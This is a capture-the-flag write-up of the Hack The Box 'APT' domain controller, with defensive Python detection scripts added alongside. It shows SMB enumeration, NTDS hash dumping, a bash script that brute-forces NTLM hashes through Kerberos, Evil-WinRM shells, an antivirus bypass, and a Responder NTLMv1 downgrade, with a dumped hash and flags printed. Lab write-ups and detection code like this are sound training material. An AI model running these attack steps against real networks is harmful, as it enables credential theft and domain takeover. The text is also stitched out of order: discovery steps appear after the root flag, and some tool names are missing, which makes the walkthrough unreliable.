As always, we start with the enumeration phase, scanning the machine for open ports and identifying the services and versions running on them.
The following nmap command scans the target for open ports quickly and saves the output to a file:
- `-sS` use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
- `--min-rate 5000` nmap will try to keep the sending rate at or above 5000 packets per second.
- `-p-` scan the entire port range, from 1 to 65535.
- `-T5` insane mode, the fastest of nmap's timing templates.
- `-Pn` assume the host is online.
- `-n` scan without reverse DNS resolution.
- `-oN` save the scan result into a file, in this case the allPorts file.
```
# Nmap 7.93 scan initiated Wed Apr 12 20:59:41 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPorts 10.10.10.213
Nmap scan report for 10.10.10.213
Host is up (0.041s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT    STATE SERVICE
80/tcp  open  http
135/tcp open  msrpc
# Nmap done at Wed Apr 12 21:00:08 2023 -- 1 IP address (1 host up) scanned in 26.45 seconds
```
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
```
nmap -sC -sV -p80,135 10.10.10.213 -oN targeted
```
- `-sC` performs the scan using the default set of scripts.
- `-sV` enables version detection.
- `-oN` save the scan result into a file, in this case the targeted file.
```
# Nmap 7.93 scan initiated Wed Apr 12 19:17:32 2023 as: nmap -sCV -p80,135 -Pn -n -oN targeted 10.10.10.213
Nmap scan report for 10.10.10.213
Host is up (0.037s latency).

PORT    STATE SERVICE VERSION
80/tcp  open  http    Microsoft IIS httpd 10.0
|_http-title: Gigantic Hosting | Home
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_  Potentially risky methods: TRACE
135/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Apr 12 19:17:47 2023 -- 1 IP address (1 host up) scanned in 14.76 seconds
```
The website on port 80 shows a hosting site named Gigantic Hosting. Nothing is interesting on the website.
- `-sS` use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
- `--min-rate 5000` nmap will try to keep the sending rate at or above 5000 packets per second.
- `-p-` scan the entire port range, from 1 to 65535.
- `-T5` insane mode, the fastest of nmap's timing templates.
- `-Pn` assume the host is online.
- `-n` scan without reverse DNS resolution.
- `-oN` save the scan result into a file, in this case the allPortsv6 file.
- `-6` scan an IPv6 address.
```
# Nmap 7.93 scan initiated Wed Apr 12 21:00:16 2023 as: nmap -sS --min-rate 5000 -p- -n -Pn -oN allPortsv6 -6 dead:beef::b885:d62a:d679:573f
Nmap scan report for apt
Host is up (0.036s latency).
Not shown: 65512 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49674/tcp open  unknown
49698/tcp open  unknown
64885/tcp open  unknown
# Nmap done at Wed Apr 12 21:00:43 2023 -- 1 IP address (1 host up) scanned in 26.41 seconds
```
There are way more ports exposed through IPv6 than IPv4. Let's get their services and versions.
- `-sC` performs the scan using the default set of scripts.
- `-sV` enables version detection.
- `-oN` save the scan result into a file, in this case the targetedv6 file.
- `-6` scan an IPv6 address.
```
# Nmap 7.93 scan initiated Wed Apr 12 22:12:17 2023 as: nmap -sCV -p53,80,88,135,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49669,49670,49674,49688,49885 -Pn -n -oN targetedv6 -6 dead:beef::b885:d62a:d679:573f
Nmap scan report for dead:beef::b885:d62a:d679:573f
Host is up (0.036s latency).

PORT      STATE    SERVICE       VERSION
53/tcp    open     domain        Simple DNS Plus
80/tcp    open     http          Microsoft IIS httpd 10.0
|_http-title: Bad Request
| http-server-header:
|   Microsoft-HTTPAPI/2.0
|_  Microsoft-IIS/10.0
88/tcp    open     kerberos-sec  Microsoft Windows Kerberos (server time: 2023-04-12 20:12:25Z)
135/tcp   open     msrpc         Microsoft Windows RPC
389/tcp   open     ldap          Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
|_ssl-date: 2023-04-12T20:13:25+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after:  2050-09-24T07:17:18
445/tcp   open     microsoft-ds  Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp   open     kpasswd5?
593/tcp   open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open     ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
|_ssl-date: 2023-04-12T20:13:25+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after:  2050-09-24T07:17:18
3268/tcp  open     ldap          Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
|_ssl-date: 2023-04-12T20:13:25+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after:  2050-09-24T07:17:18
3269/tcp  open     ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
|_ssl-date: 2023-04-12T20:13:25+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Not valid before: 2020-09-24T07:07:18
|_Not valid after:  2050-09-24T07:17:18
5985/tcp  open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
9389/tcp  open     mc-nmf        .NET Message Framing
47001/tcp open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
49664/tcp open     msrpc         Microsoft Windows RPC
49665/tcp open     msrpc         Microsoft Windows RPC
49666/tcp open     msrpc         Microsoft Windows RPC
49667/tcp open     msrpc         Microsoft Windows RPC
49669/tcp open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
49670/tcp open     msrpc         Microsoft Windows RPC
49674/tcp open     msrpc         Microsoft Windows RPC
49688/tcp filtered unknown
49885/tcp filtered unknown
Service Info: Host: APT; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: apt
|   NetBIOS computer name: APT\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: apt.htb.local
|_  System time: 2023-04-12T21:13:17+01:00
|_clock-skew: mean: -8m33s, deviation: 22m39s, median: 0s
| smb2-time:
|   date: 2023-04-12T20:13:15
|_  start_date: 2023-04-12T17:09:56
| smb2-security-mode:
|   311:
|_    Message signing enabled and required
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Apr 12 22:13:25 2023 -- 1 IP address (1 host up) scanned in 67.49 seconds
```
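The gap between the two scans is the finding worth keeping from this phase: a filtering policy that only covers the IPv4 address leaves the whole Active Directory surface (Kerberos, LDAP, SMB, WinRM) reachable over IPv6. The following Python script is an added example, not code from the writeup; it parses two nmap `-oN` outputs (trimmed copies of the allPorts and allPortsv6 results above, embedded inline) and lists the ports reachable only over IPv6, so the same comparison can be run routinely against a host's own scan files.

```python
"""Compare the ports open on a host's IPv4 and IPv6 addresses from two nmap -oN outputs.

Added example, not from the original writeup. The two scan texts below are
trimmed copies of the allPorts and allPortsv6 results shown on the page.
"""
import re

ALLPORTS_V4 = """\
Nmap scan report for 10.10.10.213
Host is up (0.041s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT    STATE SERVICE
80/tcp  open  http
135/tcp open  msrpc
"""

ALLPORTS_V6 = """\
Nmap scan report for apt
Host is up (0.036s latency).
Not shown: 65512 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49674/tcp open  unknown
49698/tcp open  unknown
64885/tcp open  unknown
"""

# One port line of nmap's normal (-oN) output: "<port>/<proto>  <state>  <service>"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")


def parse_open_ports(text):
    """Return {port: service} for every line whose STATE column is 'open'.

    Header lines, the '# Nmap ...' banner and non-open (filtered/closed)
    ports do not match and are skipped.
    """
    ports = {}
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m and m.group(3) == "open":
            ports[int(m.group(1))] = m.group(4)
    return ports


def ipv6_only_ports(v4_text, v6_text):
    """Ports open over IPv6 but not over IPv4, as {port: service} in port order."""
    v4 = parse_open_ports(v4_text)
    v6 = parse_open_ports(v6_text)
    return {port: svc for port, svc in sorted(v6.items()) if port not in v4}


def exposure_report(v4_text, v6_text):
    """Human-readable summary of the IPv4/IPv6 exposure difference."""
    only6 = ipv6_only_ports(v4_text, v6_text)
    lines = [f"{len(parse_open_ports(v4_text))} open over IPv4, "
             f"{len(parse_open_ports(v6_text))} open over IPv6, "
             f"{len(only6)} reachable only over IPv6:"]
    lines += [f"  {port}/tcp  {svc}" for port, svc in only6.items()]
    return "\n".join(lines)


if __name__ == "__main__":
    print(exposure_report(ALLPORTS_V4, ALLPORTS_V6))
```

Point the two constants at the real `allPorts` and `allPortsv6` files to run it against your own scans. The fix the report points at is a firewall or perimeter policy that covers both address families with the same rules, not disabling IPv6 on the host.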
This looks like a domain controller. Nmap got the domain name htb.local. Let's add it to the /etc/hosts file.
```
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        backup          Disk
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        SYSVOL          Disk      Logon server share
apt is an IPv6 address -- no workgroup available
```
As seen below, the backup share has one file called backup.zip. Let's transfer it to our local machine.
```
smbclient //apt/backup -N
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Sep 24 07:30:52 2020
  ..                                  D        0  Thu Sep 24 07:30:52 2020
  backup.zip                          A 10650961  Thu Sep 24 07:30:32 2020

                5114623 blocks of size 4096. 2632003 blocks available
smb: \> get backup.zip
getting file \backup.zip of size 10650961 as backup.zip (2027.5 KiloBytes/sec) (average 2027.5 KiloBytes/sec)
```
If we try to unzip it, we'll see it is protected with a password.
```
unzip backup.zip
Archive:  backup.zip
   creating: Active Directory/
[backup.zip] Active Directory/ntds.dit password:
```
Let's use zip2john and john to get the password.
```
zip2john backup.zip > hash
john -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
iloveyousomuch   (backup.zip)
1g 0:00:00:00 DONE (2023-04-14 09:02) 14.28g/s 117028p/s 117028c/s 117028C/s 123456..whitetiger
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```
Now, unzip the file with the recovered password:
```
unzip backup.zip
Archive:  backup.zip
   creating: Active Directory/
[backup.zip] Active Directory/ntds.dit password: iloveyousomuch
  inflating: Active Directory/ntds.dit
  inflating: Active Directory/ntds.jfm
   creating: registry/
  inflating: registry/SECURITY
  inflating: registry/SYSTEM
```
The archive contains ntds.dit together with the SYSTEM hive. With these two files we can dump the NTDS hashes offline using secretsdump:
```
impacket-secretsdump -system registry/SYSTEM -ntds Active\ Directory/ntds.dit LOCAL -outputfile ntds_dump
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Target system bootKey: 0x936ce5da88593206567f650411e1d16b
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 1733ad403c773dde94dddffa2292ffe9
[*] Reading and decrypting hashes from Active Directory/ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
...
[*] Cleaning up...
```
As we can see, there are a lot of users and hashes. Let's put the users in the users file, and the NTLM hashes in the ntlm file.
It found that henry.vinson is a valid user. Since we have a valid user and a list of NTLM hashes, we can try to find his hash by attempting each hash in the list. The problem is that if we try this through SMB we'll get banned.
```
crackmapexec smb apt -u 'henry.vinson' -H ntlm
SMB         apt             445    APT              [*] Windows Server 2016 Standard 14393 x64 (name:APT) (domain:htb.local) (signing:True) (SMBv1:True)
SMB         apt             445    APT              [-] htb.local\henry.vinson:2b576acbe6bcfda7294d6bd18041b8fe STATUS_LOGON_FAILURE
...
SMB         apt             445    APT              [-] Connection Error: The NETBIOS connection with the remote host timed out.
```
It seems the server bans brute-force attempts over SMB, but not over Kerberos, since that is how we were able to test which users were valid. So we need to brute force the NTLM hash through Kerberos. I wrote the following bash script, which tries to obtain a TGT for henry.vinson with each NTLM hash in the ntlm file. It uses impacket's getTGT tool, and the number of threads can be raised to make it faster.
```bash
#!/bin/bash
# Try every NTLM hash in $hash_list for one user against the KDC, $threads at a time,
# using impacket's getTGT; the first hash that yields a ticket is the valid one.
dc='apt'
username='henry.vinson'
domain='htb.local'
hash_list='/home/alfa8sa/HTB/machines/apt/ntlm'
threads=100
PROGRESS_BAR_WIDTH=25

draw_progress_bar() {
    local __value=$1
    local __max=$2
    local __unit=${3:-""}
    if (( __max < 1 )); then __max=1; fi
    local __percentage=$(( 100 - (__max*100 - __value*100) / __max ))
    local __num_bar=$(( __percentage * PROGRESS_BAR_WIDTH / 100 ))
    printf "["
    for b in $(seq 1 $__num_bar); do printf "#"; done
    for s in $(seq 1 $(( PROGRESS_BAR_WIDTH - __num_bar ))); do printf " "; done
    printf "] $__percentage%% ($__value / $__max $__unit)\r"
}

lines=$(wc -l < "$hash_list")
counter=1
div=$(( lines/threads + 1 ))   # number of batches of $threads hashes

for _ in $(seq 1 $div); do
    margin=$(( counter + threads - 1 ))
    # lines $counter..$margin of the hash list form this batch
    hashes=$(sed -n "${counter},${margin}p" "$hash_list")
    draw_progress_bar $(( counter - 1 )) $lines "hashes"
    for hash in $hashes; do
        # one request per hash in the background; record the hash that produced a ticket
        impacket-getTGT $dc/$username@$domain -hashes :$hash | grep -q "ticket" && echo $hash > .hash &
    done; wait
    if [ -f ".hash" ]; then
        echo ""
        echo "Valid NTLM hash: " $(cat .hash)
        rm -f .hash
        exit 0
    fi
    counter=$(( counter + threads ))
done
rm -f .hash
```
Run the script to get the valid NTLM hash for henry.vinson.
```
SMB         apt             445    APT              [*] Windows Server 2016 Standard 14393 x64 (name:APT) (domain:htb.local) (signing:True) (SMBv1:True)
SMB         apt             445    APT              [+] htb.local\henry.vinson:e53d87d42adaa3ca32bdb34a876cbffb
```
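From the defender's side, the asymmetry this step relies on (SMB attempts get cut off, Kerberos attempts do not) is visible in the domain controller's Security log: every wrong key presented to the KDC produces event 4771 (Kerberos pre-authentication failed) with failure code 0x18, and a hash list tried 100 at a time produces a dense burst of them for one account from one source address. The Python script below is an added example, not part of the writeup. It builds a constructed set of 4771 records in a flat key=value form (the source address 10.10.14.5 and the user jane.doe are made up for the sample) and flags any account/source pair that exceeds a threshold of failures inside a sliding time window.

```python
"""Flag bursts of Kerberos pre-authentication failures (Security event 4771).

Added example, not from the original writeup. Records are constructed here in a
flat 'key=value' form; in practice they come from the DC's Security log (for
example through Windows Event Forwarding or a SIEM query on EventID 4771).
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Failure code 0x18 is KDC_ERR_PREAUTH_FAILED: the key derived from the password
# (or, with pass-the-key, the hash itself) did not match. Other codes such as
# 0x25 (clock skew) or 0x06 (unknown principal) are not password guesses.
BAD_KEY = "0x18"


def build_sample_events():
    """Constructed 4771 records: one spray against henry.vinson plus two benign failures."""
    base = datetime(2023, 4, 14, 9, 0, 0)
    lines = []
    for i in range(30):  # 30 wrong keys in two minutes from one (constructed) source address
        ts = (base + timedelta(seconds=4 * i)).isoformat()
        lines.append(f"{ts} EventID=4771 TargetUserName=henry.vinson "
                     f"IpAddress=10.10.14.5 Status={BAD_KEY}")
    # a single typo by another (constructed) user
    lines.append(f"{(base + timedelta(minutes=1)).isoformat()} EventID=4771 "
                 f"TargetUserName=jane.doe IpAddress=10.10.10.50 Status={BAD_KEY}")
    # a clock-skew failure for the same account: not a password guess, must be ignored
    lines.append(f"{(base + timedelta(minutes=2)).isoformat()} EventID=4771 "
                 f"TargetUserName=henry.vinson IpAddress=10.10.14.5 Status=0x25")
    return lines


def parse_event(line):
    """'<iso timestamp> k=v k=v ...' -> dict with a datetime under 'ts'."""
    stamp, *fields = line.split()
    event = {"ts": datetime.fromisoformat(stamp)}
    for field in fields:
        key, _, value = field.partition("=")
        event[key] = value
    return event


def find_preauth_bursts(lines, threshold=20, window=timedelta(minutes=5)):
    """Return {(user, source_ip): peak_count} for sources that presented at least
    `threshold` wrong keys for one account inside any `window`-long interval."""
    attempts = defaultdict(list)
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4771" or ev.get("Status") != BAD_KEY:
            continue
        attempts[(ev["TargetUserName"], ev["IpAddress"])].append(ev["ts"])

    alerts = {}
    for key, times in attempts.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):  # sliding window over the sorted timestamps
            while t - times[start] > window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                alerts[key] = max(alerts.get(key, 0), count)
    return alerts


if __name__ == "__main__":
    for (user, ip), count in find_preauth_bursts(build_sample_events()).items():
        print(f"ALERT {user} from {ip}: {count} pre-auth failures within 5 minutes")
```

Note that the SMB errors in the crackmapexec output above are connection timeouts, not lockout responses, so nothing in the domain itself stopped the guessing; a lockout threshold in the password policy counts Kerberos pre-authentication failures as well, and the 4771 burst is what a SOC should alert on either way.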
Impacket includes a tool called reg.py, which allows querying registry hives (HKCR, HKCU, HKLM, HKU or HKCC) remotely with valid credentials. Let's look at the contents of HKU.
```
SMB         apt             445    APT              [*] Windows Server 2016 Standard 14393 x64 (name:APT) (domain:htb.local) (signing:True) (SMBv1:True)
SMB         apt             445    APT              [+] htb.local\henry.vinson_adm:G1#Ny5@2dvht
```
The credentials are valid, and this user seems to be a member of the Remote Management Users group, because we can get a shell via WinRM and grab the user flag.
```
Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> whoami
htb\henry.vinson_adm
*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> type \users\henry.vinson_adm\desktop\user.txt
cfafacdccf12c0e1a3965551ba302274
```
Privilege Escalation
Let's upload the WinPEAS binary to the machine in order to find possible privilege escalation paths.
If we try to run the binary, we'll see that Windows Defender is blocking the binary.
```
.\winPEASx64.exe
Program 'winPEASx64.exe' failed to run: Operation did not complete successfully because the file contains a virus or potentially unwanted software
At line:1 char:1
+ .\winPEASx64.exe
+ ~~~~~~~~~~~~~~~~.
At line:1 char:1
+ .\winPEASx64.exe
+ ~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException
    + FullyQualifiedErrorId : NativeCommandFailed
```
Fortunately for us, evil-winrm has a feature to bypass the antivirus. This way the binary will be loaded and executed in memory.
```ini
...
HTTPS = On
DNS = On
LDAP = On
...
; Custom challenge.
; Use "Random" for generating a random challenge for each requests (Default)
Challenge = 1122334455667788
...
```
Then, launch responder downgrading to LM.
```
responder -I tun0 --lm
```
- `-I` network interface to use.
- `--lm` force LM hashing downgrade.
Now we need to make the victim machine authenticate against our fake SMB server. Since we know Windows Defender is installed, we can use its MpCmdRun.exe binary to make it fetch an arbitrary file from our fake SMB server.
Now that we have the real NTLM hash of the Administrator user, we can get a shell as that user, and then all we have to do is reap the harvest and take the root flag.
```
Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
htb\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> type \users\administrator\desktop\root.txt
9b4ea0031ea51d07dd67270520495d46
```
As port 135 is also open, we can try to identify the machine's other IP addresses through it. We'll have to do it with the tool.
It found that NTLM services and clients on the domain controller support NTLMv1. This is a problem because NTLMv1 uses a weak challenge-response scheme that can be broken: with a fixed, known server challenge, the response can be reversed to the NT hash itself. The idea is to set up a fake SMB server with responder, capture the NTLMv1 response from the machine, and crack it with . First, modify the responder configuration file.
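The mitigation for this whole step is to refuse NTLMv1 on the domain controller (LmCompatibilityLevel 5, "Send NTLMv2 response only. Refuse LM & NTLM", under HKLM\SYSTEM\CurrentControlSet\Control\Lsa; level 3 or higher additionally stops the host itself from answering with NTLMv1 when a server asks for it, which is what the `--lm` downgrade here relies on) and, before doing so, to find out who still uses it. Successful NTLM logons record the negotiated flavour in Security event 4624 as "Package Name (NTLM only)" (the LmPackageName field), with the values NTLM V1, NTLM V2 or LM. The Python script below is an added example, not part of the writeup; it runs over a constructed set of 4624 records (semicolon-separated key=value; the source addresses and the legacy.scanner account are made up, and the APT$ and henry.vinson_adm entries are sample data, not logs from the box), lists the weak logons and checks which of them a given LmCompatibilityLevel would have refused.

```python
"""List NTLMv1/LM logons from Security event 4624 and check a DC's LmCompatibilityLevel.

Added example, not from the original writeup. The records below are constructed
(semicolon-separated key=value); real ones come from the DC's Security log.
"""

# LmPackageName values that mean the legacy challenge/response was accepted
WEAK_PACKAGES = {"NTLM V1", "LM"}

# Constructed 4624 records: two legacy logons, one NTLMv2 logon, one Kerberos logon
SAMPLE_4624 = [
    "TimeCreated=2023-04-14T10:01:00;EventID=4624;LogonType=3;TargetUserName=APT$;"
    "IpAddress=10.10.14.5;AuthenticationPackageName=NTLM;LmPackageName=NTLM V1",
    "TimeCreated=2023-04-14T10:01:30;EventID=4624;LogonType=3;TargetUserName=henry.vinson_adm;"
    "IpAddress=10.10.14.5;AuthenticationPackageName=NTLM;LmPackageName=NTLM V2",
    "TimeCreated=2023-04-14T10:02:00;EventID=4624;LogonType=3;TargetUserName=henry.vinson_adm;"
    "IpAddress=10.10.14.5;AuthenticationPackageName=Kerberos;LmPackageName=-",
    "TimeCreated=2023-04-14T10:03:00;EventID=4624;LogonType=3;TargetUserName=legacy.scanner;"
    "IpAddress=10.10.10.77;AuthenticationPackageName=NTLM;LmPackageName=LM",
]


def parse_event(line):
    """'k=v;k=v;...' -> dict (values may contain spaces, e.g. 'NTLM V1')."""
    return dict(field.split("=", 1) for field in line.split(";"))


def weak_ntlm_logons(lines):
    """Return [(time, account, source_ip, package)] for every 4624 whose NTLM
    flavour is LM or NTLM V1. Kerberos and NTLMv2 logons are skipped."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4624" or ev.get("AuthenticationPackageName") != "NTLM":
            continue
        if ev.get("LmPackageName") in WEAK_PACKAGES:
            hits.append((ev["TimeCreated"], ev["TargetUserName"],
                         ev["IpAddress"], ev["LmPackageName"]))
    return hits


# Meaning of HKLM\SYSTEM\CurrentControlSet\Control\Lsa\LmCompatibilityLevel on a DC
# (the "Network security: LAN Manager authentication level" policy):
#   0-3  accept LM, NTLMv1 and NTLMv2 from clients (3+ only *sends* NTLMv2 itself)
#   4    refuse LM
#   5    refuse LM and NTLMv1 (NTLMv2 only)
def dc_refuses(package, lm_compatibility_level):
    """True if a DC at this LmCompatibilityLevel would reject a logon using `package`."""
    if package == "LM":
        return lm_compatibility_level >= 4
    if package == "NTLM V1":
        return lm_compatibility_level >= 5
    return False  # NTLM V2 is accepted at every level


def remaining_weak_logons(lines, lm_compatibility_level):
    """Weak logons that would still succeed at the given level (empty means the fix is complete)."""
    return [hit for hit in weak_ntlm_logons(lines)
            if not dc_refuses(hit[3], lm_compatibility_level)]


if __name__ == "__main__":
    for when, account, source, package in weak_ntlm_logons(SAMPLE_4624):
        print(f"{when} {account} from {source} authenticated with {package}")
    print("still accepted at level 4:", remaining_weak_logons(SAMPLE_4624, 4))
    print("still accepted at level 5:", remaining_weak_logons(SAMPLE_4624, 5))
```

Run it over a few weeks of 4624 events before raising the level: whatever `weak_ntlm_logons` returns is the list of clients that will break at level 5 and need fixing first, and an empty `remaining_weak_logons(..., 5)` afterwards confirms the downgrade used in this writeup is no longer possible against the host.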